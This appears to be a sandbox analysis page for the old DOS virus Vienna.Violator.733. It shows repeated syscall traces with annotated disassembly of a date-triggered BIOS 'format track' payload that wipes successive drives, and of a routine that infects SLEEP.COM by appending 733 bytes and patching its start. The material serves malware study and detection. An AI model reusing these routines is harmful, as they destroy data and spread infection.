Sample viewer

vx.netlux.org/Virus.DOS.Vienna.Violator.733

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:11:29.575457693Z 48 PC: 12a6b | Get DOS version
2018-12-17T23:11:29.576988565Z 47 PC: 12a77 | Get disk transfer address
2018-12-17T23:11:29.57796348Z 26 PC: 12a8a | Set disk transfer address
; Date trigger: disassembly window starting at the return address of the DOS
; "Get date" call (INT 21h, AH=2Ah returns CX = year, DH = month, DL = day).
; Year, month and day are tested in turn; a failed test jumps to 0x12ad8,
; so 0x12ab8 is reached only when all three pass. In this run the trace
; logs further Get date calls at PC 12aa4 and 12ab0, so the year and month
; tests passed here.
2018-12-17T23:11:29.578877552Z 42 PC: 12a97 | Get date 0x12a97: cmp cx, 0x7ca ; year >= 1994 (0x7ca)?
0x12a9b: jge 0x12aa0
0x12a9d: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12a9f: nop
0x12aa0: mov ah, 0x2a ; AH=2Ah: Get date again
0x12aa2: int 0x21
0x12aa4: cmp dh, 0xb ; month >= 11?
0x12aa7: jge 0x12aac
0x12aa9: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12aab: nop
0x12aac: mov ah, 0x2a ; AH=2Ah: Get date a third time
0x12aae: int 0x21
0x12ab0: cmp dl, 0xd ; day of month >= 13?
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12ab7: nop
; Reached only on or after the trigger date. The routine at 0x12acb (listed
; in the windows logged at PC 12aa4 and 12ab0) issues INT 13h with AH=5 and
; DL taken from the byte at [0x365].
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19 ; stop once the byte at [0x365] equals 0x19 (25)
0x12ac3: je 0x12ad8
; Window at the second "Get date" call (INT 21h, AH=2Ah: DH = month,
; DL = day). This call being logged means the year test at 0x12a97 passed
; in this run.
2018-12-17T23:11:29.581170672Z 42 PC: 12aa4 | Get date 0x12aa4: cmp dh, 0xb ; month >= 11?
0x12aa7: jge 0x12aac
0x12aa9: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12aab: nop
0x12aac: mov ah, 0x2a ; AH=2Ah: Get date again
0x12aae: int 0x21
0x12ab0: cmp dl, 0xd ; day of month >= 13?
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12ab7: nop
; Loop body: call the routine at 0x12acb, then advance the byte at [0x365]
; until it equals 0x19 (25). The starting value of [0x365] is not shown.
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19
0x12ac3: je 0x12ad8 ; done: leave the loop
0x12ac5: inc byte ptr [0x365]
0x12ac9: loop 0x12ab8 ; decrement CX, repeat while CX != 0
; Routine at 0x12acb: register setup for a BIOS disk call. The INT 13h itself
; lies past the end of this window (see the window logged at PC 12ab0).
0x12acb: mov ah, 5 ; INT 13h function 05h (format track)
0x12acd: mov ch, 0 ; cylinder 0
0x12acf: mov dh, 0 ; head 0
0x12ad1: mov dl, byte ptr [0x365] ; drive number = byte at [0x365]
; Window at the third "Get date" call (INT 21h, AH=2Ah: DL = day). This is
; the fullest view of the date-triggered payload: on a matching date the
; code calls INT 13h AH=05h (BIOS format track) for cylinder 0, head 0 of
; successive drive numbers. INT 13h is a BIOS call rather than a DOS
; (INT 21h) call, so the syscall table presumably would not list it; whether
; the routine actually ran in this run cannot be read from the table alone.
2018-12-17T23:11:29.583103034Z 42 PC: 12ab0 | Get date 0x12ab0: cmp dl, 0xd ; day of month >= 13?
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12ab7: nop
; Loop body: the starting value of the byte at [0x365] is not shown here.
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19 ; stop once the drive byte equals 0x19 (25)
0x12ac3: je 0x12ad8
0x12ac5: inc byte ptr [0x365] ; next drive number
0x12ac9: loop 0x12ab8 ; decrement CX, repeat while CX != 0
; Routine at 0x12acb: one BIOS disk call per invocation.
0x12acb: mov ah, 5 ; INT 13h function 05h (format track)
0x12acd: mov ch, 0 ; cylinder 0
0x12acf: mov dh, 0 ; head 0
0x12ad1: mov dl, byte ptr [0x365] ; drive number = byte at [0x365]
0x12ad5: int 0x13
0x12ad7: ret
; 0x12ad8 is the common target of every failed date test and of the loop exit.
0x12ad8: pop si ; read the word on top of the stack into SI...
0x12ad9: push si ; ...and put it back, leaving the stack unchanged
0x12ada: add si, 0x2d ; SI + 0x2d; later code addresses its buffers as SI + offset (0x12bd8-0x12bec)
0x12add: nop
2018-12-17T23:11:29.586500426Z 78 PC: 12b5b | Find first file
2018-12-17T23:11:29.592476303Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T23:11:29.598123399Z 67 PC: 12bab | Get or set file attributes
2018-12-17T23:11:29.614371113Z 61 PC: 12bb6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:11:29.620709552Z 87 PC: 12bc2 | Get or set file date and time
; Window at the DOS "Get time" call (INT 21h, AH=2Ch returns DH = seconds),
; made after the target file has been opened. The low three bits of the
; seconds value select one of two paths. In this run the next trace row is
; the 3-byte read at PC 12bf0, so the jne at 0x12bd1 was taken; the rows
; after it (seek, 733-byte write, seek, 3-byte write) are consistent with
; appending a 733-byte body and rewriting the file's first three bytes.
; For detection: the trace brackets the writes with file date/time and
; attribute calls (presumably save and restore, since the table does not say
; get or set), so timestamps may not change; the 733-byte growth remains.
2018-12-17T23:11:29.621986588Z 44 PC: 12bce | Get time 0x12bce: and dh, 7 ; seconds & 7
0x12bd1: jne 0x12be3 ; non-zero: read/append path at 0x12be3
; Path taken when (seconds & 7) == 0: write 5 bytes and skip the rest.
; No seek is logged between Open and this point, so this write would
; presumably land at the start of the file - TODO confirm. The file handle
; is presumably in BX, set outside this window.
0x12bd3: mov ah, 0x40 ; AH=40h: Write file or device
0x12bd5: mov cx, 5 ; 5 bytes
0x12bd8: mov dx, si
0x12bda: add dx, 0x9d ; buffer = SI + 0x9d (contents not shown in this trace)
0x12bde: int 0x21
0x12be0: jmp 0x12c47 ; bypass the read/append sequence
0x12be2: nop
; Read/append path: read the file's first 3 bytes into SI + 0x1d.
0x12be3: mov ah, 0x3f ; AH=3Fh: Read file or device
0x12be5: mov cx, 3 ; 3 bytes
0x12be8: mov dx, 0x1d
0x12beb: nop
0x12bec: add dx, si ; buffer = SI + 0x1d
0x12bee: int 0x21
0x12bf0: jb 0x12c47 ; carry set = DOS error: give up on this file
0x12bf2: cmp ax, 3 ; AX = bytes actually read
0x12bf5: jne 0x12c47 ; short read: give up on this file
0x12bf7: mov ax, 0x4202 ; AH=42h Move file pointer, AL=02h: offset relative to end of file
0x12bfa: mov cx, 0 ; high word of the offset = 0
2018-12-17T23:11:29.624776737Z 63 PC: 12bf0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:11:29.630885983Z 66 PC: 12c02 | Move file pointer
2018-12-17T23:11:29.639363716Z 64 PC: 12c26 | Write file or device (Write 733 bytes on handle 5)
2018-12-17T23:11:29.64801905Z 66 PC: 12c38 | Move file pointer
2018-12-17T23:11:29.649373537Z 64 PC: 12c47 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:29.656609004Z 87 PC: 12c5a | Get or set file date and time
2018-12-17T23:11:29.658021094Z 62 PC: 12c5e | Close file
2018-12-17T23:11:29.666307027Z 67 PC: 12c6d | Get or set file attributes
2018-12-17T23:11:29.676242528Z 26 PC: 12c7a | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17206,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:14.017499274Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:14.019248596Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:14.021897003Z 26 PC: 12a8a | Set disk transfer address
; Date trigger: disassembly window starting at the return address of the DOS
; "Get date" call (INT 21h, AH=2Ah returns CX = year, DH = month, DL = day).
; Year, month and day are tested in turn; a failed test jumps to 0x12ad8.
; No further Get date rows are logged in this run, which suggests the year
; test failed and control went straight to 0x12ad8; the run's settings record
; below lists Year 1980. A sandbox clock set before the trigger date will not
; exercise the code at 0x12ab8.
2018-12-25T12:55:14.023483367Z 42 PC: 12a97 | Get date 0x12a97: cmp cx, 0x7ca ; year >= 1994 (0x7ca)?
0x12a9b: jge 0x12aa0
0x12a9d: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12a9f: nop
0x12aa0: mov ah, 0x2a ; AH=2Ah: Get date again
0x12aa2: int 0x21
0x12aa4: cmp dh, 0xb ; month >= 11?
0x12aa7: jge 0x12aac
0x12aa9: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12aab: nop
0x12aac: mov ah, 0x2a ; AH=2Ah: Get date a third time
0x12aae: int 0x21
0x12ab0: cmp dl, 0xd ; day of month >= 13?
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12ab7: nop
; Reached only on or after the trigger date. The routine at 0x12acb (listed
; in the first run's windows at PC 12aa4 and 12ab0) issues INT 13h with AH=5
; (BIOS format track) and DL taken from the byte at [0x365].
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19 ; stop once the byte at [0x365] equals 0x19 (25)
0x12ac3: je 0x12ad8
2018-12-25T12:55:14.03261111Z 78 PC: 12b5b | Find first file
2018-12-25T12:55:14.041049752Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T12:55:14.047293975Z 67 PC: 12bab | Get or set file attributes
2018-12-25T12:55:14.064145842Z 61 PC: 12bb6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:14.072160694Z 87 PC: 12bc2 | Get or set file date and time
; Window at the DOS "Get time" call (INT 21h, AH=2Ch returns DH = seconds),
; made after the target file has been opened. The low three bits of the
; seconds value select one of two paths. In this run the next trace row is
; the 3-byte read at PC 12bf0, so the jne at 0x12bd1 was taken; the rows
; after it (seek, 733-byte write, seek, 3-byte write) are consistent with
; appending a 733-byte body and rewriting the file's first three bytes.
2018-12-25T12:55:14.074092541Z 44 PC: 12bce | Get time 0x12bce: and dh, 7 ; seconds & 7
0x12bd1: jne 0x12be3 ; non-zero: read/append path at 0x12be3
; Path taken when (seconds & 7) == 0: write 5 bytes and skip the rest.
; No seek is logged between Open and this point, so this write would
; presumably land at the start of the file - TODO confirm.
0x12bd3: mov ah, 0x40 ; AH=40h: Write file or device
0x12bd5: mov cx, 5 ; 5 bytes
0x12bd8: mov dx, si
0x12bda: add dx, 0x9d ; buffer = SI + 0x9d (contents not shown in this trace)
0x12bde: int 0x21
0x12be0: jmp 0x12c47 ; bypass the read/append sequence
0x12be2: nop
; Read/append path: read the file's first 3 bytes into SI + 0x1d.
0x12be3: mov ah, 0x3f ; AH=3Fh: Read file or device
0x12be5: mov cx, 3 ; 3 bytes
0x12be8: mov dx, 0x1d
0x12beb: nop
0x12bec: add dx, si ; buffer = SI + 0x1d
0x12bee: int 0x21
0x12bf0: jb 0x12c47 ; carry set = DOS error: give up on this file
0x12bf2: cmp ax, 3 ; AX = bytes actually read
0x12bf5: jne 0x12c47 ; short read: give up on this file
0x12bf7: mov ax, 0x4202 ; AH=42h Move file pointer, AL=02h: offset relative to end of file
0x12bfa: mov cx, 0 ; high word of the offset = 0
2018-12-25T12:55:14.07694953Z 63 PC: 12bf0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:14.084978387Z 66 PC: 12c02 | Move file pointer
2018-12-25T12:55:14.087105316Z 64 PC: 12c26 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:55:14.096743036Z 66 PC: 12c38 | Move file pointer
2018-12-25T12:55:14.098365949Z 64 PC: 12c47 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:14.108455494Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T12:55:14.110342202Z 62 PC: 12c5e | Close file
2018-12-25T12:55:14.119522828Z 67 PC: 12c6d | Get or set file attributes
2018-12-25T12:55:14.132315607Z 26 PC: 12c7a | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17206,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:14.057638827Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:14.059127925Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:14.060194136Z 26 PC: 12a8a | Set disk transfer address
; Date trigger: disassembly window starting at the return address of the DOS
; "Get date" call (INT 21h, AH=2Ah returns CX = year, DH = month, DL = day).
; Year, month and day are tested in turn; a failed test jumps to 0x12ad8.
; No further Get date rows are logged in this run, which suggests the year
; test failed and control went straight to 0x12ad8; the run's settings record
; below lists Year 1980.
2018-12-25T12:55:14.061185685Z 42 PC: 12a97 | Get date 0x12a97: cmp cx, 0x7ca ; year >= 1994 (0x7ca)?
0x12a9b: jge 0x12aa0
0x12a9d: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12a9f: nop
0x12aa0: mov ah, 0x2a ; AH=2Ah: Get date again
0x12aa2: int 0x21
0x12aa4: cmp dh, 0xb ; month >= 11?
0x12aa7: jge 0x12aac
0x12aa9: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12aab: nop
0x12aac: mov ah, 0x2a ; AH=2Ah: Get date a third time
0x12aae: int 0x21
0x12ab0: cmp dl, 0xd ; day of month >= 13?
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12ab7: nop
; Reached only on or after the trigger date. The routine at 0x12acb (listed
; in the first run's windows at PC 12aa4 and 12ab0) issues INT 13h with AH=5
; (BIOS format track) and DL taken from the byte at [0x365].
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19 ; stop once the byte at [0x365] equals 0x19 (25)
0x12ac3: je 0x12ad8
2018-12-25T12:55:14.064361002Z 78 PC: 12b5b | Find first file
2018-12-25T12:55:14.070169912Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T12:55:14.075544847Z 67 PC: 12bab | Get or set file attributes
2018-12-25T12:55:14.097481562Z 61 PC: 12bb6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:14.1040591Z 87 PC: 12bc2 | Get or set file date and time
; Window at the DOS "Get time" call (INT 21h, AH=2Ch returns DH = seconds),
; made after the target file has been opened. The low three bits of the
; seconds value select one of two paths. In this run the next trace row is
; the 3-byte read at PC 12bf0, so the jne at 0x12bd1 was taken.
2018-12-25T12:55:14.105370534Z 44 PC: 12bce | Get time 0x12bce: and dh, 7 ; seconds & 7
0x12bd1: jne 0x12be3 ; non-zero: read/append path at 0x12be3
; Path taken when (seconds & 7) == 0: write 5 bytes and skip the rest.
; No seek is logged between Open and this point, so this write would
; presumably land at the start of the file - TODO confirm.
0x12bd3: mov ah, 0x40 ; AH=40h: Write file or device
0x12bd5: mov cx, 5 ; 5 bytes
0x12bd8: mov dx, si
0x12bda: add dx, 0x9d ; buffer = SI + 0x9d (contents not shown in this trace)
0x12bde: int 0x21
0x12be0: jmp 0x12c47 ; bypass the read/append sequence
0x12be2: nop
; Read/append path: read the file's first 3 bytes into SI + 0x1d.
0x12be3: mov ah, 0x3f ; AH=3Fh: Read file or device
0x12be5: mov cx, 3 ; 3 bytes
0x12be8: mov dx, 0x1d
0x12beb: nop
0x12bec: add dx, si ; buffer = SI + 0x1d
0x12bee: int 0x21
0x12bf0: jb 0x12c47 ; carry set = DOS error: give up on this file
0x12bf2: cmp ax, 3 ; AX = bytes actually read
0x12bf5: jne 0x12c47 ; short read: give up on this file
0x12bf7: mov ax, 0x4202 ; AH=42h Move file pointer, AL=02h: offset relative to end of file
0x12bfa: mov cx, 0 ; high word of the offset = 0
2018-12-25T12:55:14.107616282Z 63 PC: 12bf0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:14.114113845Z 66 PC: 12c02 | Move file pointer
2018-12-25T12:55:14.11556503Z 64 PC: 12c26 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:55:14.124090012Z 66 PC: 12c38 | Move file pointer
2018-12-25T12:55:14.125574291Z 64 PC: 12c47 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:14.13183987Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T12:55:14.133156063Z 62 PC: 12c5e | Close file
2018-12-25T12:55:14.140655626Z 67 PC: 12c6d | Get or set file attributes
2018-12-25T12:55:14.147801136Z 26 PC: 12c7a | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":7,"TimeBased":true,"OriginalID":17206,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:14.440718323Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:14.442648921Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:14.443667498Z 26 PC: 12a8a | Set disk transfer address
; Date trigger: disassembly window starting at the return address of the DOS
; "Get date" call (INT 21h, AH=2Ah returns CX = year, DH = month, DL = day).
; Year, month and day are tested in turn; a failed test jumps to 0x12ad8.
; No further Get date rows are logged in this run, which suggests the year
; test failed and control went straight to 0x12ad8; the run's settings record
; below lists Year 1980.
2018-12-25T12:55:14.444611306Z 42 PC: 12a97 | Get date 0x12a97: cmp cx, 0x7ca ; year >= 1994 (0x7ca)?
0x12a9b: jge 0x12aa0
0x12a9d: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12a9f: nop
0x12aa0: mov ah, 0x2a ; AH=2Ah: Get date again
0x12aa2: int 0x21
0x12aa4: cmp dh, 0xb ; month >= 11?
0x12aa7: jge 0x12aac
0x12aa9: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12aab: nop
0x12aac: mov ah, 0x2a ; AH=2Ah: Get date a third time
0x12aae: int 0x21
0x12ab0: cmp dl, 0xd ; day of month >= 13?
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12ab7: nop
; Reached only on or after the trigger date. The routine at 0x12acb (listed
; in the first run's windows at PC 12aa4 and 12ab0) issues INT 13h with AH=5
; (BIOS format track) and DL taken from the byte at [0x365].
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19 ; stop once the byte at [0x365] equals 0x19 (25)
0x12ac3: je 0x12ad8
2018-12-25T12:55:14.44754986Z 78 PC: 12b5b | Find first file
2018-12-25T12:55:14.453428864Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T12:55:14.458853021Z 67 PC: 12bab | Get or set file attributes
2018-12-25T12:55:14.475273984Z 61 PC: 12bb6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:14.481654842Z 87 PC: 12bc2 | Get or set file date and time
; Window at the DOS "Get time" call (INT 21h, AH=2Ch returns DH = seconds),
; made after the target file has been opened. The low three bits of the
; seconds value select one of two paths. In this run the next trace row is
; the 3-byte read at PC 12bf0, so the jne at 0x12bd1 was taken.
2018-12-25T12:55:14.483020095Z 44 PC: 12bce | Get time 0x12bce: and dh, 7 ; seconds & 7
0x12bd1: jne 0x12be3 ; non-zero: read/append path at 0x12be3
; Path taken when (seconds & 7) == 0: write 5 bytes and skip the rest.
; No seek is logged between Open and this point, so this write would
; presumably land at the start of the file - TODO confirm.
0x12bd3: mov ah, 0x40 ; AH=40h: Write file or device
0x12bd5: mov cx, 5 ; 5 bytes
0x12bd8: mov dx, si
0x12bda: add dx, 0x9d ; buffer = SI + 0x9d (contents not shown in this trace)
0x12bde: int 0x21
0x12be0: jmp 0x12c47 ; bypass the read/append sequence
0x12be2: nop
; Read/append path: read the file's first 3 bytes into SI + 0x1d.
0x12be3: mov ah, 0x3f ; AH=3Fh: Read file or device
0x12be5: mov cx, 3 ; 3 bytes
0x12be8: mov dx, 0x1d
0x12beb: nop
0x12bec: add dx, si ; buffer = SI + 0x1d
0x12bee: int 0x21
0x12bf0: jb 0x12c47 ; carry set = DOS error: give up on this file
0x12bf2: cmp ax, 3 ; AX = bytes actually read
0x12bf5: jne 0x12c47 ; short read: give up on this file
0x12bf7: mov ax, 0x4202 ; AH=42h Move file pointer, AL=02h: offset relative to end of file
0x12bfa: mov cx, 0 ; high word of the offset = 0
2018-12-25T12:55:14.485479659Z 63 PC: 12bf0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:14.49165702Z 66 PC: 12c02 | Move file pointer
2018-12-25T12:55:14.492890976Z 64 PC: 12c26 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:55:14.501642008Z 66 PC: 12c38 | Move file pointer
2018-12-25T12:55:14.504103687Z 64 PC: 12c47 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:14.510611515Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T12:55:14.512039437Z 62 PC: 12c5e | Close file
2018-12-25T12:55:14.520686045Z 67 PC: 12c6d | Get or set file attributes
2018-12-25T12:55:14.530382039Z 26 PC: 12c7a | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":7,"TimeBased":true,"OriginalID":17206,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:14.640675494Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:14.642055669Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:14.643351673Z 26 PC: 12a8a | Set disk transfer address
; Date trigger: disassembly window starting at the return address of the DOS
; "Get date" call (INT 21h, AH=2Ah returns CX = year, DH = month, DL = day).
; Year, month and day are tested in turn; a failed test jumps to 0x12ad8.
; No further Get date rows are logged in this run, which suggests the year
; test failed and control went straight to 0x12ad8.
2018-12-25T12:55:14.644353016Z 42 PC: 12a97 | Get date 0x12a97: cmp cx, 0x7ca ; year >= 1994 (0x7ca)?
0x12a9b: jge 0x12aa0
0x12a9d: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12a9f: nop
0x12aa0: mov ah, 0x2a ; AH=2Ah: Get date again
0x12aa2: int 0x21
0x12aa4: cmp dh, 0xb ; month >= 11?
0x12aa7: jge 0x12aac
0x12aa9: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12aab: nop
0x12aac: mov ah, 0x2a ; AH=2Ah: Get date a third time
0x12aae: int 0x21
0x12ab0: cmp dl, 0xd ; day of month >= 13?
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8 ; test failed: skip to 0x12ad8
0x12ab7: nop
; Reached only on or after the trigger date. The routine at 0x12acb (listed
; in the first run's windows at PC 12aa4 and 12ab0) issues INT 13h with AH=5
; (BIOS format track) and DL taken from the byte at [0x365].
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19 ; stop once the byte at [0x365] equals 0x19 (25)
0x12ac3: je 0x12ad8
2018-12-25T12:55:14.646048982Z 78 PC: 12b5b | Find first file
2018-12-25T12:55:14.651242259Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T12:55:14.655813185Z 67 PC: 12bab | Get or set file attributes
2018-12-25T12:55:14.669010527Z 61 PC: 12bb6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:14.676432908Z 87 PC: 12bc2 | Get or set file date and time
; Window at the DOS "Get time" call (INT 21h, AH=2Ch returns DH = seconds),
; made after the target file has been opened. The low three bits of the
; seconds value select one of two paths. In this run the next trace row is
; the 3-byte read at PC 12bf0, so the jne at 0x12bd1 was taken.
2018-12-25T12:55:14.677873417Z 44 PC: 12bce | Get time 0x12bce: and dh, 7 ; seconds & 7
0x12bd1: jne 0x12be3 ; non-zero: read/append path at 0x12be3
; Path taken when (seconds & 7) == 0: write 5 bytes and skip the rest.
; No seek is logged between Open and this point, so this write would
; presumably land at the start of the file - TODO confirm.
0x12bd3: mov ah, 0x40 ; AH=40h: Write file or device
0x12bd5: mov cx, 5 ; 5 bytes
0x12bd8: mov dx, si
0x12bda: add dx, 0x9d ; buffer = SI + 0x9d (contents not shown in this trace)
0x12bde: int 0x21
0x12be0: jmp 0x12c47 ; bypass the read/append sequence
0x12be2: nop
; Read/append path: read the file's first 3 bytes into SI + 0x1d.
0x12be3: mov ah, 0x3f ; AH=3Fh: Read file or device
0x12be5: mov cx, 3 ; 3 bytes
0x12be8: mov dx, 0x1d
0x12beb: nop
0x12bec: add dx, si ; buffer = SI + 0x1d
0x12bee: int 0x21
0x12bf0: jb 0x12c47 ; carry set = DOS error: give up on this file
0x12bf2: cmp ax, 3 ; AX = bytes actually read
0x12bf5: jne 0x12c47 ; short read: give up on this file
0x12bf7: mov ax, 0x4202 ; AH=42h Move file pointer, AL=02h: offset relative to end of file
0x12bfa: mov cx, 0 ; high word of the offset = 0
2018-12-25T12:55:14.680186044Z 63 PC: 12bf0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:14.689924784Z 66 PC: 12c02 | Move file pointer
2018-12-25T12:55:14.691569193Z 64 PC: 12c26 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:55:14.704479356Z 66 PC: 12c38 | Move file pointer
2018-12-25T12:55:14.706542959Z 64 PC: 12c47 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:14.713715501Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T12:55:14.71525927Z 62 PC: 12c5e | Close file
2018-12-25T12:55:14.724139017Z 67 PC: 12c6d | Get or set file attributes
2018-12-25T12:55:14.735076748Z 26 PC: 12c7a | Set disk transfer address